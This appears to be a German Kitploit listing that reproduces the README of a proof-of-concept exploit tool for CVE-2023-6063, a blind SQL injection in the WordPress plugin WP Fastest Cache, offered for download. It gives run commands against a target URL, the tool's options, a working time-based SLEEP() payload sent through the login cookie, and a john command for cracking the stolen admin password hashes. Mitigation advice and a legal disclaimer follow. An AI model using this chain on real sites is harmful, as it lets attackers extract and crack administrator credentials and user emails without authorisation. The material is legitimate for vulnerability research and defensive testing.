Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2023-6063-PoC — Ein Proof of Concept für CVE-2023-6063, eine zeitbasierte blinde SQL-Injection-Schwachstelle in WP Fastest Cache ≤1.2.2. | Kitploit
Tools/GitHubGitHub/incommatose/cve-2023-6063-poc
Passwort-CrackingSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & Bildung
GitHubincommatose/cve-2023-6063-poc

CVE-2023-6063-PoC

Ein Proof of Concept für CVE-2023-6063, eine zeitbasierte blinde SQL-Injection-Schwachstelle in WP Fastest Cache ≤1.2.2.

Repository anzeigen
2139vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

PoC für CVE-2023-6063: WP Fastest Cache 1.2.2 Unauthenticated Blind SQL Injection

Static Badge Static Badge Static Badge

Ein Proof of Concept für CVE-2023-6063, eine zeitbasierte blinde SQL-Injection-Schwachstelle in WP Fastest Cache ≤1.2.2. Extrahiert gehashte Passwörter (user_pass) und E-Mails (user_email) aus der Tabelle wp_users durch Missbrauch des Cookies wordpress_logged_in.

Funktionen

  • Zeitbasierte Datenextraktion (Zeichen für Zeichen) mittels SLEEP()-Verzögerungen.
  • Unterstützt benutzerdefinierte Cookies, Zielbenutzernamen und Hash-Validierung.

Dieses Skript extrahiert:

  • ☑️ WordPress-Passwort-Hashes (MD5/PHPass).
  • ☑️ Zugehörige E-Mail-Adressen.
  • CLI-Argumente für flexibles Testen (--just-hash, --just-email, --debug).

Verwendung

Installiere die Abhängigkeiten (falls nicht installiert):

root@kitploit:~
pip install -r requirements.txt

Einfache Verwendung:

root@kitploit:~
python3 poc.py -u https://vulnerable-website.com --username admin --delay 5

Alle Optionen:

root@kitploit:~
  -h, --help            Zeigt diese Hilfemeldung an und beendet das Programm
  -u URL, --url URL     Vollständige URL zu WordPress zum Testen von CVE-2023-6063
  --username USERNAME   Definiere einen Benutzer, dessen Passwort-Hash extrahiert werden soll
  -d DELAY, --delay DELAY
                        Zeit für die Antwort des Webservers (Standard: 5, Minimum: 2)
  -H HASH, --hash HASH  Hash zur Verifizierung gegen die wp_users-Tabelle; falls der Hash Sonderzeichen enthält, bitte einfache Anführungszeichen verwenden -> '<hash>'
  --domain DOMAIN       Name der Domäne für E-Mail-Validierung
  -c COOKIE, --cookie COOKIE
                        Gib einen Cookie-Namen an, falls dieser in deinem Kontext abweicht
  --status-code STATUS_CODE
                        Verwende einen bestimmten positiven Statuscode (Standard: 200)
  --debug               Mehr Ausführlichkeit
  --just-hash           Nur den gehashten Passwort extrahieren
  --just-email          Nur den E-Mail-Wert für einen Benutzer extrahieren

💻 Demo

Dies ist eine Demo für den Admin-Benutzer

https://github.com/user-attachments/assets/21ea643d-3b11-401f-813f-b85abdb05890

Wenn Passwort-Hashes durchsickern, verwende john oder hashcat zur Entschlüsselung mit dem PHPass-Algorithmus, falls das Passwort angreifbar ist.

Beispiel für John:

root@kitploit:~
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt --format=phpass

🕵️‍♂️ Technische Details

📖 Beschreibung der Schwachstelle

Das WP Fastest Cache Plugin (≤1.2.2) für WordPress ist anfällig für eine nicht authentifizierte bline SQL-Injection über das Cookie wordpress_logged_in. Angreifer können diese Schwachstelle ausnutzen, um sensible Daten (z. B. Passwort-Hashes, E-Mail-Adressen) aus der Tabelle wp_users zu extrahieren, indem sie zeitbasierte Verzögerungen (SLEEP()) in SQL-Abfragen verwenden.

root@kitploit:~
" AND (IF((SELECT user_pass FROM wp_users WHERE user_login="admin") LIKE 'a%', SLEEP(5), 0))-- -

🚨 Haftungsausschluss: Verwende diese Informationen nur für ethische Sicherheitstests mit entsprechender Genehmigung. Unbefugte Ausnutzung ist illegal.

  • CVE-ID: CVE-2023-6063
  • Schwachstellen-Score: 7,5 (Hoch)
  • Schwachstellentyp: SQL Injection (Blind, zeitbasiert)
  • Betroffene Software: WP Fastest Cache (WordPress Plugin) ≤ v1.2.2

🔍 Angriffsvektor

  • Ausnutzbarkeit: Remote (Keine Authentifizierung erforderlich)
  • Angriffskomplexität: Niedrig (Ausnutzbar durch manipulierte HTTP-Anfragen)

🔥 Auswirkungen:

  • Vertraulichkeit: Hoch (Leckt Admin-Anmeldedaten)
  • Integrität: Keine
  • Verfügbarkeit: Keine

📌 Betroffene Versionen

  • WP Fastest Cache Versionen ≤1.2.2

🛡️ Abhilfemaßnahmen

Aktualisiere WP Fastest Cache auf Version >1.2.2.

  • Upgrade auf WP Fastest Cache v1.2.3 oder höher.
  • Wende WAF-Regeln an, um SQLi-Payloads in Cookies zu blockieren.
  • Plugin deaktivieren, falls nicht verwendet.

📚 Referenzen

  • NIST NVD Eintrag
  • WordPress Plugin Hinweis
  • CVE Details

⚖️ Rechtliches

  • Dieses Skript dient nur zu Bildungszwecken. Hole immer explizite Erlaubnis ein, bevor du testest.
Tool herunterladen